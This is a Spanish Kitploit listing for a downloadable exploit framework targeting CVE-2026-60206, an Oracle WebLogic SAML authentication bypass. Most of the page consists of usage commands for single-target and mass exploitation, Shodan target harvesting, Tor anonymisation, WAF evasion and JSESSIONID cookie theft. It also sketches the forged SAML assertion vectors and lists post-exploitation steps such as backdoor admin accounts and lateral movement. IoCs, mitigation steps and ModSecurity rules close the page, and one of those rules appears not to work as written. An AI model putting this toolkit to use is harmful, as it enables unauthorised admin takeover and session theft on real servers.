Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-60206-PoC-Exploit — 👾 CVE-2026-60206 - Framework de Explotación de Bypass de Autenticación SAML de Oracle WebLogic ⚡Versiones Bash y Python. Características: --detect verificación segura, --exploit combo/unsigned/xsw/nameid/all, --shodan integración, --tor soporte, escaneo masivo, salida JSON/CSV/JSONL, validación de cookies. 🛡️ CVSS 9.9 Crítico - Úsalo éticamente, mantente legal. 🔒 | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-60206-poc-exploit
Autenticación y AutorizaciónFrameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónEvasión de WAF

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Pruebas de Penetración
Red Teaming
GitHubtc4dy/cve-2026-60206-poc-exploit

CVE-2026-60206-PoC-Exploit

Ver Repositorio
422hace 1 mesAún no revisado

Acerca de

👾 CVE-2026-60206 - Framework de Explotación de Bypass de Autenticación SAML de Oracle WebLogic ⚡Versiones Bash y Python. Características: --detect verificación segura, --exploit combo/unsigned/xsw/nameid/all, --shodan integración, --tor soporte, escaneo masivo, salida JSON/CSV/JSONL, validación de cookies. 🛡️ CVSS 9.9 Crítico - Úsalo éticamente, mantente legal. 🔒

Compartir

CVE-2026-60206

CVE-2026-60206 - Framework-Toolkit de Explotación de Omisión de Autenticación SAML de Oracle WebLogic

CVE-2026-60206 CVSS 9.9 CISA KEV Python 3.6+

Pre-Auth Bypass SAML Injection Admin Access Cross-Platform

Oracle WebLogic Server — Omisión de Autenticación SAML → Toma de Control de Administrador

Framework de Explotación y Escáner Masivo
Solo para pruebas de seguridad autorizadas.


⚖️ Aviso Legal y Uso Responsable

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.

Los autores y colaboradores no son responsables de ningún uso indebido o daño causado por este software. Los usuarios son los únicos responsables de asegurarse de contar con permiso escrito explícito del propietario del objetivo antes de realizar las pruebas. El acceso no autorizado a sistemas informáticos es ilegal según la Computer Fraud and Abuse Act (CFAA) y leyes similares en todo el mundo.

Al utilizar este software, usted acepta:

  • Úselo solo en sistemas que le pertenezcan o para los que tenga permiso explícito de prueba.
  • Cumpla con todas las leyes locales, estatales y federales aplicables.
  • No lo utilice para actividades maliciosas, destructivas o ilegales.

⚠️ ADVERTENCIA: Esta vulnerabilidad se está explotando activamente en la naturaleza. El uso no autorizado puede acarrear graves consecuencias legales.


[+!] Resumen de la Vulnerabilidad

CVE-2026-60206 es una vulnerabilidad crítica de omisión de autenticación no autenticada en la implementación SAML (Security Assertion Markup Language) de Oracle WebLogic Server. Permite a atacantes remotos omitir la autenticación SAML y obtener acceso administrativo a la consola de WebLogic sin credenciales válidas.

Cómo funciona:

  1. Inyección SAML: La vulnerabilidad se origina por una validación incorrecta de las aserciones SAML. Los atacantes pueden crear respuestas SAML maliciosas que omiten las comprobaciones de autenticación.

  2. Omisión de Firma: La vulnerabilidad permite omitir la validación de firmas XML mediante ataques de XML Signature Wrapping (XSW), en los que los atacantes envuelven aserciones maliciosas con firmas legítimas.

  3. Manipulación de NameID: Los atacantes pueden inyectar comentarios o manipular el campo NameID para hacerse pasar por usuarios privilegiados.

  4. Acceso de Administrador: La explotación exitosa concede al atacante acceso administrativo a la consola de WebLogic Server con control total.

Datos Clave:


🛠️ Framework de Explotación

El multi-exploit educativo completo encadena múltiples vectores de ataque SAML para lograr la omisión de autenticación, con funciones avanzadas para escaneo masivo, cookies y acceso administrativo.

✨ Características

Vectores de Ataque


🕵️ Verificador Seguro (--detect)

El verificador seguro realiza una detección de vulnerabilidades no intrusiva sin ejecutar cargas útiles dañinas ni realizar cambios en el sistema.

✨ Características


📦 Instalación y Requisitos

Requisitos Previos

  • Python 3.6+ o Bash 3.2+
  • curl (para la versión Bash)
  • pip (para la librería requests, versión Python)

Instalar Dependencias

root@kitploit:~
# Python version
pip install requests urllib3

# Optional: Shodan support
pip install shodan

# Bash version: curl only (no additional dependencies)

[!NOTE] La versión Bash funciona solo con curl y no tiene dependencias externas. La versión Python requiere requests y urllib3 (opcional: shodan para la integración con Shodan).


🚀 Ejemplos de Uso

[1] Framework de Explotación en Python (exploit.py)

root@kitploit:~
# Single target exploit (combo mode)
python exploit.py -u https://192.168.1.100:7002 --exploit --user admin

# Exploit with all attack vectors
python exploit.py -u https://192.168.1.100:7002 --mode all --exploit -v

# Mass scanning from file (50 threads)
python exploit.py -l targets.txt --exploit -t 50 -o results.json

# Safe detection only (non-intrusive)
python exploit.py -l targets.txt --detect -o scan_results.csv

# Shodan integration
export SHODAN_API_KEY="your_api_key"
python exploit.py --shodan --shodan-query "WebLogic Server port:7002" --exploit

# Tor anonymized scanning
python exploit.py -l targets.txt --exploit --tor -t 20

# Proxy support
python exploit.py -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# Streaming JSONL output (memory efficient for large scans)
python exploit.py -l targets.txt --exploit -o results.jsonl

# Quiet mode (minimal output)
python exploit.py -l targets.txt --exploit -q -o results.json

# Custom timeout and retry
python exploit.py -u https://192.168.1.100:7002 --exploit --timeout 20 --retry 5 --delay 2.0

# SSL verification bypass
python exploit.py -u https://192.168.1.100:7002 --exploit --no-verify

# Verbose debugging
python exploit.py -u https://192.168.1.100:7002 --exploit -v

[2] Framework de Explotación en Bash (exploit.sh)

root@kitploit:~
# Single target exploit
./exploit.sh -u https://192.168.1.100:7002 --exploit --user admin

# Mass scanning
./exploit.sh -l targets.txt --mode all --exploit -o results.json

# Tor anonymized scanning
./exploit.sh -l targets.txt --exploit --tor -t 20

# Shodan integration
export SHODAN_API_KEY="your_api_key"
./exploit.sh --shodan --exploit -o shodan_results.json

# Streaming JSONL output
./exploit.sh -l targets.txt --exploit -o results.jsonl

# Proxy support
./exploit.sh -u https://192.168.1.100:7002 --exploit --proxy http://127.0.0.1:8080

# SSL verification bypass
./exploit.sh -u https://192.168.1.100:7002 --exploit --no-verify

# Quiet mode
./exploit.sh -l targets.txt --exploit -q -o results.json

# Verbose debugging
./exploit.sh -u https://192.168.1.100:7002 --exploit -v

[3] Validador Básico (verifier_poc.sh)

root@kitploit:~
# Single target validation
./verifier_poc.sh -u https://192.168.1.100:7002 --user admin

# Mass validation with report
./verifier_poc.sh -l targets.txt --user admin -o report.txt

# SSL verification bypass
./verifier_poc.sh -u https://192.168.1.100:7002 --no-verify

# Proxy support
./verifier_poc.sh -u https://192.168.1.100:7002 --proxy http://127.0.0.1:8080

🎯 Versiones Afectadas

⚠️ Importante: Esta vulnerabilidad afecta a implementaciones de WebLogic Server autoalojadas. Aplique el Oracle CPU de julio de 2026 de inmediato.


🧠 Análisis Técnico Profundo

1. Omisión de Autenticación SAML

La vulnerabilidad permite a los atacantes omitir la autenticación SAML creando respuestas SAML maliciosas que son validadas incorrectamente por la implementación SAML de WebLogic.

Endpoint Vulnerable:

root@kitploit:~
POST /saml2/sp/acs HTTP/1.1
Host: target:7002
Content-Type: application/x-www-form-urlencoded

SAMLResponse=<base64_encoded_malicious_assertion>&RelayState=/

2. Vectores de Ataque

Aserción sin firmar

saml2:Assertion saml2:Subject <saml2:NameID Format="...">admin</saml2:NameID> </saml2:Subject>

</saml2:Assertion>

XML Signature Wrapping (XSW)

ds:Signature <ds:Reference URI="#legit"> </ds:Reference> </ds:Signature>

<saml2:Assertion ID="evil"> saml2:Subjectadmin</saml2:Subject> </saml2:Assertion>

Inyección de comentarios en NameID

<saml2:NameID Format="...">

lowpriv

</saml2:NameID>

3. Post-Explotación

Robo de Cookies

La explotación exitosa produce una cookie JSESSIONID, que concede acceso administrativo a la consola de WebLogic.

Secuestro de Sesión

La cookie robada se puede utilizar para acceder a:

  • Consola de Administración de WebLogic
  • Implementar/desimplementar aplicaciones
  • Acceder a recursos JNDI
  • Ejecutar comandos arbitrarios vía JMX

Persistencia

  • Implementar aplicaciones maliciosas (archivos WAR)
  • Crear usuarios administradores de puerta trasera (backdoor)
  • Instalar herramientas de acceso remoto

Movimiento Lateral

  • Acceder a otros servidores de la red mediante credenciales robadas
  • Explotar relaciones de confianza entre WebLogic y otros sistemas
  • Moverse lateralmente hacia redes internas (pivot)

🔍 Indicadores de Compromiso (IoCs)

Análisis de Registros

Busque en los registros de WebLogic:

  • access.log – solicitudes a /saml2/sp/acs, /saml2/acs con parámetros SAML inusuales
  • domain.log – intentos de omisión de autenticación con aserciones SAML no válidas
  • diagnostic.log – errores de análisis SAML o fallos de validación de firma

Solicitudes Sospechosas

  • Parámetros SAMLResponse que contengan:
    • Múltiples etiquetas <saml2:Assertion>
    • Comentarios en campos <saml2:NameID>
    • Aserciones sin firmar
    • XML malicioso codificado en Base64
    • javascript: o eval() en los parámetros

Archivos

  • Archivos de sesión inesperados en los directorios temporales de WebLogic
  • Archivos de configuración modificados (config.xml, jps-config.xml)
  • Archivos WAR nuevos en el directorio autodeploy
  • Archivos weblogic.security modificados

Red

  • Conexiones administrativas no autorizadas a la consola de WebLogic
  • Escaneos de puertos inusuales dirigidos a endpoints SAML
  • Conexiones salientes desde el servidor WebLogic a IPs desconocidas
  • Conexiones de shell inversa en puertos inusuales

Procesos

  • Procesos Java inesperados
  • Procesos shell generados desde WebLogic
  • Conexiones de red desde el usuario de WebLogic a hosts externos

🛡️ Mitigación y Remediación

Acciones Inmediatas

  1. Aplique el Oracle CPU de julio de 2026 de inmediato
  2. Desactive SAML si no se usa activamente
  3. Supervise los endpoints SAML para detectar actividad sospechosa
  4. Revise los registros de acceso para detectar intentos de explotación
  5. Rote todas las credenciales en los sistemas afectados

Acciones a Largo Plazo

  1. Implemente reglas WAF para bloquear solicitudes SAML maliciosas
  2. Active la validación de firma SAML con modo estricto
  3. Auditorías de seguridad periódicas de las configuraciones de WebLogic
  4. Segmentación de red para limitar la exposición de WebLogic
  5. Implemente monitoreo SIEM para eventos de WebLogic

Reglas WAF

root@kitploit:~
# Block SAML requests with multiple assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10001,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Multiple SAML Assertions',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*<saml2:Assertion>.*"

# Block SAML requests with comments in NameID
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10002,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - NameID Comments',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:NameID.*<!--.*-->.*"

# Block unsigned SAML assertions
SecRule REQUEST_URI "/saml2/sp/acs|/saml2/acs" \
    "id:10003,phase:1,deny,status:403,\
    msg:'CVE-2026-60206 - Unsigned Assertion',\
    chain"
    SecRule ARGS:SAMLResponse ".*<saml2:Assertion>.*(?!<ds:Signature>).*"

📚 Referencias

  • NVD - CVE-2026-60206
  • Aviso de Oracle Critical Patch Update - julio de 2026
  • Catálogo CISA KEV
  • SecurityFocus - CVE-2026-60206
  • The Hacker News - WebLogic Zero-Day Explotado

🔗 Otros Exploits

  • CVE-2026-15409/15410 - Framework Multi-Exploit de SonicWall SMA1000
  • CVE-2026-6875 - Framework de Exploit RCE Pre-Auth de ServiceNow
  • CVE-2026-41091 - SolarFlare (RedSun) LPE de Microsoft Defender
  • CVE-2026-57821 - Kit de Inyección SQL de Apache Fineract
  • CVE-2026-41940 - Omisión de Autenticación de cPanel/WHM
Descargar herramienta
AtributoValor
📅 DescubiertaJulio de 2026 (Oracle CPU)
⚠️ Puntuación CVSS9.9 (CRÍTICA)
📋 CISA KEVAñadida el 21 de julio de 2026
🎯 Productos AfectadosOracle WebLogic Server (Fusion Middleware)
🔄 Versiones CorregidasOracle CPU julio de 2026
🔓 AutenticaciónNo requerida (Pre-Auth)
🌍 Explotación ActivaConfirmada en la naturaleza (julio de 2026)
CaracterísticaDescripción
🚀 Exploit Multi-Vector7 vectores de ataque: unsigned, xsw_v1-4, nameid, combo
💻 Escaneo MasivoEscaneo concurrente con grupo de hilos (Python) / FIFO (Bash)
🔐 Robo de CookiesRoba JSESSIONID para secuestro de sesión
👑 Acceso a Consola de AdministraciónAcceso administrativo completo a la consola de WebLogic
📁 Detección de VersiónDetecta versiones de WebLogic y estado de vulnerabilidad
🌐 Escaneo por LotesExplotación masiva de múltiples objetivos con hilos
🎯 Detección SeguraIndicador --detect opcional para verificación no intrusiva de vulnerabilidad
🧩 Integración con ShodanCarga objetivos directamente desde la búsqueda de Shodan
🔍 Soporte TorAnonimiza el escaneo con proxy Tor
📊 Múltiples Formatos de SalidaSalida en streaming JSON, CSV, JSONL
🪟 MultiplataformaCompatible con Linux, macOS, BSD, Alpine, WSL
🔒 Seguro para HilosUsa mecanismos de bloqueo para operaciones concurrentes
📋 Guardado Automático de SesiónGuarda cookies exitosas para uso posterior
⚙️ Omisión de WAFRotación de User-Agent y retardos aleatorios
VectorDescripción
unsignedAserción SAML no autenticada sin firma
xsw_v1XML Signature Wrapping - Múltiples aserciones
xsw_v2XSW - Omisión de firma enveloped
xsw_v3XSW - Manipulación de espacios de nombres
xsw_v4XSW - Inyección de múltiples aserciones
nameidInyección de comentarios en NameID
comboAtaque combinado (unsigned + XSW + NameID)
CaracterísticaDescripción
🔍 Detección de WebLogicIdentifica instancias de WebLogic mediante LoginForm.jsp
📊 Detección de VersiónDetecta versiones específicas de WebLogic y niveles de parche
🧪 Descubrimiento de Endpoints SAMLComprueba endpoints SAML ACS
🔒 No IntrusivoSolo identifica versiones vulnerables
📋 Salida JSON/CSVExporta resultados para informes
🔄 Escaneo MasivoEscanea múltiples objetivos con soporte de hilos
Versión de Oracle WebLogicEstado
12.2.1.4.0🔴 VULNERABLE
14.1.1.0.0🔴 VULNERABLE
14.1.2.0.0🔴 VULNERABLE
15.1.1.0.0🔴 VULNERABLE
Otras versionesConsulta el Oracle CPU de julio de 2026